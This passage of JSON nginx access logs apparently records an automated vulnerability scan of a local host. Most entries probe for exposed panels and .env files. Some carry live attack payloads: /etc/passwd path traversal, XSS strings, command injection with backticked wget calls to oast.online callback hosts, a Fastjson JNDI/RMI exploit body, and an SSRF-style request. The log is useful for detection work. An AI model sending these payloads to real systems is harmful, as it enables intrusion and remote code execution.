"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /IntellectMain.jsp?IntellectSystem=https://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"x_login=../../../wp-config","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"action=&token=`wget http://c9v8hs0smpv8c6ag07h0y7z687nux39m7.oast.online`&mode=`wget http://c9v8hs0smpv8c6ag07h0ty9xayim8qznh.oast.online`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/297MdqFkk6Pq3NJ0sqmpg0NV9W8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MdpLAnSpHSEnK7kgG4DPYpMo.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.595","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8hs0smpv8c6ag07h06pdntter7mbdk.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:31 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9v8hs0smpv8c6ag07h0f689ya5z51tjj.oast.online%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert 